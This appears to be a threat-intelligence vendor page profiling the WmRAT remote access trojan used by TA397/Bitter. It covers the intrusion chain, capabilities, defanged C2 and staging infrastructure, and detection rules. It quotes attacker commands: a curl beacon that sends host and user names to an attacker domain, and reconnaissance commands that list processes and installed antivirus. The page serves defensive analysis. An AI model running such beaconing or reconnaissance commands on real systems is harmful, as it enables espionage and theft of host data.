WmRAT is a C++ remote access trojan used by TA397, also known as Bitter, in espionage operations. Reporting cited its use in late 2024 campaigns targeting government and defense organizations, including a Turkish defense-sector target, and more broadly in activity aligned with intelligence collection in support of a South Asian government’s interests. In the observed intrusion chain, spearphishing delivered a RAR archive containing a decoy PDF, a PDF-masquerading LNK, and NTFS alternate data streams with PowerShell. The PowerShell created a scheduled task named DsSvcCleanup that beaconed to attacker infrastructure; operators later manually delivered an MSI file, anvrsa.msi, which installed the WmRAT payload anvrsa.exe. Proofpoint also reported WmRAT and MiyaRAT as two distinct C++ malware families manually deployed by TA397 during hands-on-keyboard activity.
Documented WmRAT capabilities include file upload and download, screenshot capture, geolocation, directory enumeration, and arbitrary command execution. In the analyzed sample, WmRAT decrypted its C2 domain academymusica[.]com by subtracting 0x25 from characters in an encrypted blob and used hardcoded port 47408. Researchers also noted junk threads that repeatedly gather host information, likely to create noise for analysts and defenders. Associated infrastructure mentioned in the reporting includes the staging domain jacknwoods[.]com and WmRAT C2 domain academymusica[.]com; at the time of analysis these resolved to 185.244.151[.]84 and 38.180.142[.]228 respectively. Detection content also referenced a YARA rule named APT_IN_TA397_wmRAT that tracks WmRAT via socket usage, error handling, and reused strings.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Proofpoint observed TA397 operators respond to these requests with manual commands approximately 12 hours after the first scheduled task request, deploying two distinct payloads... This command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file “anvrsa.exe”.
19 distinct techniques documented for this family, organized by ATT&CK tactic.
The attack chain used... a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads... the command then set up a scheduled task named “DsSvcCleanup”.
This scheduled task attempted to send target host information (username and computer name) with the curl utility every 17 minutes... GET hxxp://jacknwoods[.]com/jacds.php?jin=%computername%_%username%
TA397 issuing the following commands to enumerate the target machine: cd C:\programdata dir >> abc.pdf tasklist >> abc.pdf wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName >> abc.pdf
WmRAT... enumerate directories and files... supported commands... 22: get file listing from given directory... MiyaRAT supports: GDIR – get directory tree, GFS – enumerate all files from a specific directory
This scheduled task attempted to send target host information with the curl utility every 17 minutes to the domain jacknwoods[.]com... Proofpoint observed TA397 operators respond to these requests with manual commands...
WmRAT... can... upload or download files... MiyaRAT supports: SFS – connect to new socket to upload and download files via UPL/DWNL | This command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file “anvrsa.exe”... Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running “gfxview.msi”.
7 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
C++ malware family used in an espionage intrusion against a Turkish defense-sector organization.
Remote access trojan used by Bitter/TA397 in targeting activity (Turkey noted) as part of an espionage-focused toolset.
wmRAT is a remote access trojan (RAT) deployed by TA397 for hands-on-keyboard access, enabling remote control and data exfiltration from victim systems.
Remote access trojan (RAT) tracked via a new YARA rule; detection focuses on socket usage, error handling, and reused strings.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.